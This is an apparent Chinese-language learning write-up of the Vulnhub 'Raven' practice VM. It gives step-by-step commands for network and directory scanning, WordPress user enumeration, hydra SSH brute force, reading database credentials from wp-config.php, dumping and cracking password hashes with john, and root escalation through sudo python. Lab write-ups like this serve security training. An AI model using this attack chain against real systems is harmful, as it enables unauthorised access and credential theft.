vulhub靶场学习之raven
环境准备
raven靶场下载
下载链接https://www.vulnhub.com/entry/raven-1,256/
下载完成后,使用VMware导入镜像启动
kali和raven都选择nat模式启动
1.信息收集
靶机ip收集
使用kali自带工具arp-scan扫描ip
什么是arp
地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,是根据IP地址获得物理地址MAC的一个TCP/IP协议。通过ARP,在局域网可以很容易构成一个ARP欺骗,从而得到有用数据信息。
arp-scan -l
-l 从网络接口配置生成地址
得到靶机ip后
进行nmap端口扫描
扫描得知靶机22,80,111端口开启,浏览器访问靶机
dirb扫描靶机网站
dirb http://192.168.30.140
可以看到有wordpress网站, 看到wordpress网站后台登录到入口
点击log in发现无法访问,网上搜索了一下得知解析有问题,需要在hosts配置下
能正常访问
因为探测到wordpress,所以直接上wordpress漏洞探测工具,这里使用kali自带的WPscan, 先暴力枚举用户名
wpscan --url http://$ip/wordpress/ -eu
收集到steven和michael两个用户,存到user.txt文件中
使用hydra工具暴力破解密码
cp /usr/share/wordlists/rockyou.txt pass
hydra -L user.txt -P pass 192.168.30.140 ssh
这里我使用的是新版kali,rockyou.txt文件需要解压
使用gzip -d解压就行
获取到ssh登录到用户密码:michael
ssh连上,开始后续利用
查看靶机是否运行MySQL服务
切换到wordpress目录,发现config配置文件,可能存在用户密码
查看config文件,发现了数据库的用户密码
用户密码为:root、R@v3nSecurity
cat wp-config.php
用刚才收集到的数据库用户密码登录mysql
mysql -u root -p
R@v3nSecurity
show databases;
use wordpress;
show tables;
select * from wp_users;
发现两组用户密码
michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
john解码,最后得到steven:pink84
把密码放入文件swn里面通过john解码
vim swn.txt
cat swn.txt
john swn.txt --wordlist=/usr/share/wordlists/rockyou.txt
提权
使用steven用户远程登录ssh
ssh steven@192.168.30.140
pink84
利用优化命令执行终端的命令提权
sudo python -c ‘import pty; pty.spawn(“/bin/bash”);’